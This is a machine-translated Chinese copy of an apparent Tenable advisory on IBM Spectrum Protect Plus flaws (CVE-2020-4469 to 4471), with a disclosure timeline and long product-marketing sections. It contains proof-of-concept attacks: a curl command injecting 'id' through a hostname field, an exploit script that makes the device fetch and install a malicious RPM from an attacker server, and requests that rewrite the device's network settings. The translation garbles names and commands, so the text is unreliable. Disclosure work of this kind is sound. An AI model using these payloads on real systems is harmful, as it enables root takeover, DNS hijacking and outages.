脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

IBM频谱保护+多个漏洞

至关重要的

剧情简介

站得住脚的发现多个漏洞在IBM频谱保护+ (SPP) 10.1.5构建2204。

cve - 2020 - 4469:未经身份验证的命令注入

注意:这是一个不完整的修复cve - 2020 - 4211。

IBM SPP 10.1.5-2181后来试图解决这个漏洞single-quoting POST HTTP请求中提供的主机名参数设置小型设备的主机名。然而,它仍然是容易受到命令注入后CURL命令:

概念验证
curl ki - tlsv1.2 - h”x-ac-sessionid: abcd“- d”主机名= ";id > / tmp / cmd_injection echo '”“https://
               :8090 / emi / api /主机名”

一个未经身份验证的远程攻击者可以利用此漏洞与根特权运行任意命令。

cve - 2020 - 4470:管理控制台插件路径遍历未经身份验证的远端控制设备

路径遍历脆弱性存在于IBM SPP管理控制台管理控制台安装一个插件。一个未经身份验证的远程攻击者可以利用此漏洞上传任意文件的目录可写的管理员帐户。

在一个攻击的情况下,攻击者发送一个HTTP请求发送到目标请求从一个attacker-controlled URL下载RPM包。攻击者然后发送另一个HTTP请求安装RPM包上传。攻击者可以将RPM(即恶意内容。scriptlet)实现远程代码执行使用root特权。

概念验证
频谱保护PoC文件

附加是一个python脚本PoC和RPM包样本(攻击者- RPM - 1.0 - 0. - noarch.rpm),攻击者可以上传并安装。示例RPM将id命令的输出写入/ tmp /砍SPP设备。可以使用PoC如下:

python3 ibm_spp_file_upload_rce_cve - 2020 - 4470。py - t < target_host > - r攻击者- rpm - 1.0 - 0. - noarch.rpm

PoC启动一个本地httpd RPM。请确认运行PoC的用户权限绑定一个TCP端口8080(默认)

RPM规范(attacker-rpm.spec)文件用于生成攻击者- RPM - 1.0 - 0. - noarch。rpm也一并附呈。

下面显示了一个PoC的运行:

(root@host ibm) # python3 ibm_spp_file_upload_rce_cve - 2020 - 4470。py - t < target_host > - r攻击者- rpm - 1.0 - 0. - noarch.rpmStarting httpd on :8080 to serve attacker-rpm-1.0-0.noarch.rpm, DocumentRoot /work/ibm Requesting target  to download attacker-rpm-1.0-0.noarch.rpm from :8080 and save it to /tmp on   - - [19/Apr/2020 21:11:08] "GET /attacker-rpm-1.0-0.noarch.rpm HTTP/1.1" 200 - Installing /tmp/attacker-rpm-1.0-0.noarch.rpm on  {"commandoutput":{"errorCode":"0","commandOutput":"","commandErrorOutput":""}}

cve - 2020 - 4471:网络配置操作和设备重启

一个缺陷存在于IBM SPP管理控制台由于缺乏验证URL端点/ emi / api / netconfig。一个未经身份验证的远程攻击者可以获取和设置网络配置SPP设备通过发送一个精雕细琢的HTTP请求的端点。

概念验证

在一个攻击的情况下,攻击者首先发送一个GET请求到端点测当前网络配置:

旋度ki - tlsv1.2 - h x-ac-sessionid: abcd的https://
               :8090 / emi / api / netconfig“{”主机名”:“localhost”、“ip4prefix”:“22”,“ninterface”:“ens160”、“ip4address”:“xxx.xxx.xxx.xxx”、“ip4gateway”:“xxx.xxx.xxx.xxx”、“ip4dns”:“xxx.xxx.xxx。xxx, xxx.xxx.xxx.xxx”、“ip4domainsearch”:“some.search.domain”、“bootProtocol”:“dhcp”、“连接”:“ens160”}

攻击者发送一个POST请求相同的端点来改变网络配置:

curl ki - tlsv1.2 - h的x-ac-sessionid: abcd - h”application / json - type:“- d”{“主机名”:“localhost”、“ip4prefix”:“22”,“ninterface”:“ens160”、“ip4address”:“xxx.xxx.xxx.xxx”、“ip4gateway”:“xxx.xxx.xxx.xxx”、“ip4dns”:“xxx.xxx.xxx。xxx, xxx.xxx.xxx.xxx”、“ip4domainsearch changed.search“:”。域”、“bootProtocol”:“静态”、“连接”:“ens160”}“https://
               :8090 / emi / api / netconfig“HTTP / 1.1 200 OK服务器:Apache-Coyote / 1.1 X-Application-Context:用途:8090日期:星期一,2020年4月20日00:33:18 GMT - type: application / json; charset = utf - 8传输编码:分块{“commandoutput”:{“错误代码”:“0”,“commandoutput”:“所有验证通过/etc/sysconfig/network-scripts / ifcfg-ens160 \ n \ nSaving配置”,“commandErrorOutput”: "}}

处理端点的java代码执行一个python脚本,脚本更新网络配置和重新启动后的设备更新。

利用这个漏洞攻击的例子包括(但不限于)DNS劫持(通过改变DNS服务器)和DoS(重启设备)。

解决方案

IBM已经包含cve - 2020 - 4469的修复补丁,cve - 2020 - 4471,部分修复版本10.1.6 cve - 2020 - 4470。

披露时间表

04/19/2020——漏洞发现
04/21/2020——漏洞报告CERT / CC。多联机# 20-04-VRHDQ提交跟踪。披露日期是2020年7月20日。
04/24/2020 - CERT答道。票是追踪VU # 728137。
04/28/2020 - CERT站得住脚的感谢。
05/18/2020——站得住脚的要求更新。
05/27/2020 - CERT从IBM说,他们还没有收到回复。
08/18/2020——站得住脚的通知IBM cve - 2020 - 4470的不完整的补丁

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2020 - 37
CVSSv2基地/时间的分数
10.0/7.8
CVSSv2向量
AV: N /交流:L /非盟:N / C: C / I: C / A: C
受影响的产品
IBM频谱保护+ 10.1.0-10.1.5
风险因素
至关重要的

咨询时间

06/15/2020——咨询发表。
08/26/2020——解决方案和信息披露时间表更新

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map